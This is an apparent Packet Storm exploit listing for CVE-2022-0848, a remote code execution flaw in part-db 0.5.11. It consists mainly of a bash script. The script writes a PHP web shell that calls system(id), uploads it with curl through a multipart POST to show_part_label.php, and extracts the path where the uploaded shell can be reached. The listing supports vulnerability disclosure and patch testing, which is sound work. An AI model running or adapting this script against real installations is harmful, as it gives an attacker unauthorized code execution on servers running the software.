Lucene search

K
packetstormSunny MehraPACKETSTORM:166217
HistoryMar 07, 2022 - 12:00 a.m.

part-db 0.5.11 Remote Code Execution

2022-03-0700:00:00
Sunny Mehra
packetstormsecurity.com
202
remote code execution
rce
part-db 0.5.11
cve-2022-0848
php shell code
bash
curl
remote attack

EPSS

0.089

Percentile

94.6%

`# Exploit Title: part-db 0.5.11 - Remote Code Execution (RCE)  
# Google Dork: NA  
# Date: 03/04/2022  
# Exploit Author: Sunny Mehra @DSKMehra  
# Vendor Homepage: https://github.com/part-db/part-db  
# Software Link: https://github.com/part-db/part-db  
# Version: [ 0.5.11.]   
# Tested on: [KALI OS]  
# CVE : CVE-2022-0848  
#  
---------------  
  
#!/bin/bash  
host=127.0.0.1/Part-DB-0.5.10 #WEBHOST  
#Usage: Change host   
#Command: bash exploit.sh  
#EXPLOIT BY @DSKMehra  
echo "<?php system(id); ?>">POC.phtml #PHP Shell Code  
result=`curl -i -s -X POST -F "[email protected]" "http://$host/show_part_label.php" | grep -o -P '(?<=value="data/media/labels/).*(?=" > <p)'`  
rm POC.phtml  
echo Shell Location : "$host/data/media/labels/$result"  
  
`